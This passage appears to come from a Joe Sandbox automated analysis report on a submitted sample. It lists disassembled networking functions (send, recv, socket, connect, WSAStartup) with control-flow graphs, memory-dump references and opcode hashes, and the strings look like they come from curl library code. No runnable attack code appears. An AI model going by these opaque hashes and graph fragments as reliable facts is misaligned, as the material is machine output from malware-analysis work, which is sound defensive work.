                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: c7b598c97eafeefcaf889a0d2e0a78789031ddbda0be0d5c931d3ddf73f53375
                                                              • Instruction ID: 86fb19372fbd599a21224810a79f268ef2414c7e47deccad1397fce761fff99e
                                                              • Opcode Fuzzy Hash: c7b598c97eafeefcaf889a0d2e0a78789031ddbda0be0d5c931d3ddf73f53375
                                                              • Instruction Fuzzy Hash: 6871C2B49143099FDB40EF69D58479EBBF0FF84308F10885DE99897310E7749A889F92
                                                              Function 002776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1516 2776a0-2776be 1517 2776e6-2776f2 send 1516->1517 1518 2776c0-2776c7 1516->1518 1520 2776f4-277709 call 2772a0 1517->1520 1521 27775e-277762 1517->1521 1518->1517 1519 2776c9-2776d1 1518->1519 1522 2776d3-2776e4 1519->1522 1523 27770b-277759 call 2772a0 call 27cb20 call 5f8c50 1519->1523 1520->1521 1522->1520 1523->1521
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=',00000000,?,?,002807BF), ref: 002776EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N='$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-1514272970
                                                              • Opcode ID: 138c7321aea7df961ea2b6d54708a208c22c2d80f8016ab096b0c1a70661aabe
                                                              • Instruction ID: 595b01e6a3e5306e98650d50722278cdcaad5563c6d22479603eaf4683606b12
                                                              • Opcode Fuzzy Hash: 138c7321aea7df961ea2b6d54708a208c22c2d80f8016ab096b0c1a70661aabe
                                                              • Instruction Fuzzy Hash: 2C110DB1A3D3557BD1109F199C4AD2B7B5CEBC2B58F054919FC1C53382E6759C1086F1
                                                              Function 002A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1635 2a9290-2a92ed call 2776a0 1638 2a93c3-2a93ce 1635->1638 1639 2a92f3-2a92fb 1635->1639 1646 2a93d0-2a93e1 1638->1646 1647 2a93e5-2a9427 call 28d090 call 2b4f40 1638->1647 1640 2a93aa-2a93af 1639->1640 1641 2a9301-2a9333 call 28d8c0 call 28d9a0 1639->1641 1644 2a9456-2a9470 1640->1644 1645 2a93b5-2a93bc 1640->1645 1659 2a93a7 1641->1659 1660 2a9335-2a9364 WSAIoctl 1641->1660 1649 2a9429-2a9431 1645->1649 1650 2a93be 1645->1650 1646->1645 1651 2a93e3 1646->1651 1647->1644 1647->1649 1654 2a9439-2a943f 1649->1654 1655 2a9433-2a9437 1649->1655 1650->1644 1651->1644 1654->1644 1658 2a9441-2a9453 call 2b50a0 1654->1658 1655->1644 1655->1654 1658->1644 1659->1640 1663 2a939b-2a93a4 1660->1663 1664 2a9366-2a936f 1660->1664 1663->1659 1664->1663 1667 2a9371-2a9390 setsockopt 1664->1667 1667->1663 1668 2a9392-2a9395 1667->1668 1668->1663
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 002A935C
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 002A9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: c070b9a2e1e81e3d6899d427fb31455c298a474601568426da2b2a7d4d3b520b
                                                              • Instruction ID: 0e1e84074bdccca731de7dfa3e96b8faeea20f5dcbf9138dd28ac99b78dcafd3
                                                              • Opcode Fuzzy Hash: c070b9a2e1e81e3d6899d427fb31455c298a474601568426da2b2a7d4d3b520b
                                                              • Instruction Fuzzy Hash: 51510774600305AFEB10DF25C881FAA77B5FF89314F148568FD588B282EB31E9A1CB51
                                                              Function 00277770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1669 277770-27778e 1670 2777b6-2777c2 recv 1669->1670 1671 277790-277797 1669->1671 1673 2777c4-2777d9 call 2772a0 1670->1673 1674 27782e-277832 1670->1674 1671->1670 1672 277799-2777a1 1671->1672 1675 2777a3-2777b4 1672->1675 1676 2777db-277829 call 2772a0 call 27cb20 call 5f8c50 1672->1676 1673->1674 1675->1673 1676->1674
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 9e9cdc5baa8f29d19cfca90f9615d505e517a4dd031c38a8875fd6fc455b2606
                                                              • Instruction ID: 6bade4b13771021fa9765dd1228982e9acff57de3b7f4808ba70901c7a62fd98
                                                              • Opcode Fuzzy Hash: 9e9cdc5baa8f29d19cfca90f9615d505e517a4dd031c38a8875fd6fc455b2606
                                                              • Instruction Fuzzy Hash: 66113AB5A393457BE1109F159C4AE2BBB5CEBC6B68F054519FC1C93382D2719C5085F2
                                                              Function 002775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1688 2775e0-2775ed 1689 277607-277629 socket 1688->1689 1690 2775ef-2775f6 1688->1690 1691 27763f-277642 1689->1691 1692 27762b-27763c call 2772a0 1689->1692 1690->1689 1693 2775f8-2775ff 1690->1693 1692->1691 1694 277643-277699 call 2772a0 call 27cb20 call 5f8c50 1693->1694 1695 277601-277602 1693->1695 1695->1689
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 6315ebd4f2de835502c97954c6f280cef69b172fa8b395921acfa95204090035
                                                              • Instruction ID: e770da1b293b87875d21421a7e8fd1e90631b3946d4ef7684c9dbb8359bcf27c
                                                              • Opcode Fuzzy Hash: 6315ebd4f2de835502c97954c6f280cef69b172fa8b395921acfa95204090035
                                                              • Instruction Fuzzy Hash: B1114C71A2425227DA105F2EAC1BE9F3B48FFC2725F054915F828D63D2D3328CA4D6D1
                                                              Function 002AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1797 2aa150-2aa159 1798 2aa15f-2aa17b 1797->1798 1799 2aa250 1797->1799 1800 2aa249-2aa24f 1798->1800 1801 2aa181-2aa1ce getsockname 1798->1801 1800->1799 1802 2aa1d0-2aa1f5 call 28d090 1801->1802 1803 2aa1f7-2aa214 call 2aef30 1801->1803 1811 2aa240-2aa246 call 2b4f40 1802->1811 1803->1800 1808 2aa216-2aa23b call 28d090 1803->1808 1808->1811 1811->1800
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 002AA1C6
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 002AA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 002AA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 49fd65c13c10410336b3ea9bf59f397abc0c8877cb633b7493d7a6ea37f57247
                                                              • Instruction ID: c49b6a217f1ab52246c994f190a5886431e8afccca05b4d7af7255aee7f352c3
                                                              • Opcode Fuzzy Hash: 49fd65c13c10410336b3ea9bf59f397abc0c8877cb633b7493d7a6ea37f57247
                                                              • Instruction Fuzzy Hash: FA21F831858680BBE7219B18DC46FE773BCEF92328F040615F99853151FF3259998BE2
                                                              Function 0028D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1817 28d5e0-28d5ee 1818 28d5f0-28d604 call 28d690 1817->1818 1819 28d652-28d662 WSAStartup 1817->1819 1825 28d61b-28d651 call 297620 1818->1825 1826 28d606-28d614 1818->1826 1821 28d670-28d676 1819->1821 1822 28d664-28d66f 1819->1822 1821->1818 1823 28d67c-28d68d 1821->1823 1826->1825 1831 28d616 1826->1831 1831->1825
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0028D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: ffb2983ad3dba25980f24f93705465bef91d995dbd461b939ca1f0017166b24c
                                                              • Instruction ID: 423f5d1b66e5d33624ba703814df1c31a4888f6609c8bf509ef1c383b7b85fc6
                                                              • Opcode Fuzzy Hash: ffb2983ad3dba25980f24f93705465bef91d995dbd461b939ca1f0017166b24c
                                                              • Instruction Fuzzy Hash: 5C017BD4D6938607EB11BF3CAD1B3662298AB51304F880A69EC48D11C2F66DC4ACC392
                                                              Function 0033AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1855 33aa30-33aa64 1857 33ab04-33ab09 1855->1857 1858 33aa6a-33aaa7 call 32e730 1855->1858 1859 33ae80-33ae89 1857->1859 1862 33aaa9-33aabd 1858->1862 1863 33ab0e-33ab13 1858->1863 1865 33ab18-33ab50 1862->1865 1866 33aabf-33aac7 1862->1866 1864 33ae2e 1863->1864 1867 33ae30-33ae4a call 32ea60 call 32ebf0 1864->1867 1872 33ab58-33ab6d 1865->1872 1866->1864 1868 33aacd-33ab02 1866->1868 1880 33ae75-33ae7d 1867->1880 1881 33ae4c-33ae57 1867->1881 1868->1872 1874 33ab96-33abab socket 1872->1874 1875 33ab6f-33ab73 1872->1875 1874->1864 1879 33abb1-33abc5 1874->1879 1875->1874 1877 33ab75-33ab8f 1875->1877 1877->1879 1895 33ab91 1877->1895 1882 33abd0-33abed ioctlsocket 1879->1882 1883 33abc7-33abca 1879->1883 1880->1859 1888 33ae59-33ae5e 1881->1888 1889 33ae6e-33ae6f 1881->1889 1885 33ac10-33ac14 1882->1885 1886 33abef-33ac0a 1882->1886 1883->1882 1884 33ad2e-33ad39 1883->1884 1893 33ad52-33ad56 1884->1893 1894 33ad3b-33ad4c 1884->1894 1890 33ac37-33ac41 1885->1890 1891 33ac16-33ac31 1885->1891 1886->1885 1897 33ae29 1886->1897 1888->1889 1896 33ae60-33ae6c 1888->1896 1889->1880 1900 33ac43-33ac46 1890->1900 1901 33ac7a-33ac7e 1890->1901 1891->1890 1891->1897 1893->1897 1898 33ad5c-33ad6b 1893->1898 1894->1893 1894->1897 1895->1864 1896->1880 1897->1864 1902 33ad70-33ad78 1898->1902 1905 33ad04-33ad08 1900->1905 1906 33ac4c-33ac51 1900->1906 1908 33ac80-33ac9b 1901->1908 1909 33ace7-33acfe 1901->1909 1911 33ada0-33adae connect 1902->1911 1912 33ad7a-33ad7f 1902->1912 1905->1884 1913 33ad0a-33ad28 1905->1913 1906->1905 1914 33ac57-33ac78 1906->1914 1908->1909 1910 33ac9d-33acc1 1908->1910 1909->1905 1915 33acc6-33acd7 1910->1915 1917 33adb3-33adcf 1911->1917 1912->1911 1916 33ad81-33ad99 1912->1916 1913->1884 1913->1897 1914->1915 1915->1897 1923 33acdd-33ace5 1915->1923 1916->1917 1924 33add5-33add8 1917->1924 1925 33ae8a-33ae91 1917->1925 1923->1905 1923->1909 1926 33ade1-33adf1 1924->1926 1927 33adda-33addf 1924->1927 1925->1867 1928 33adf3-33ae07 1926->1928 1929 33ae0d-33ae12 1926->1929 1927->1902 1927->1926 1928->1929 1934 33aea8-33aead 1928->1934 1930 33ae14-33ae17 1929->1930 1931 33ae1a-33ae1c call 33af70 1929->1931 1930->1931 1935 33ae21-33ae23 1931->1935 1934->1867 1936 33ae93-33ae9d 1935->1936 1937 33ae25-33ae27 1935->1937 1938 33aeaf-33aeb1 call 32e760 1936->1938 1939 33ae9f-33aea6 call 32e7c0 1936->1939 1937->1867 1942 33aeb6-33aebe 1938->1942 1939->1942 1944 33aec0-33aedb call 32e180 1942->1944 1945 33af1a-33af1f 1942->1945 1944->1867 1948 33aee1-33aeec 1944->1948 1945->1867 1949 33af02-33af06 1948->1949 1950 33aeee-33aeff 1948->1950 1951 33af08-33af0b 1949->1951 1952 33af0e-33af15 1949->1952 1950->1949 1951->1952 1952->1859
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0033AB9A
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0033ABE3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
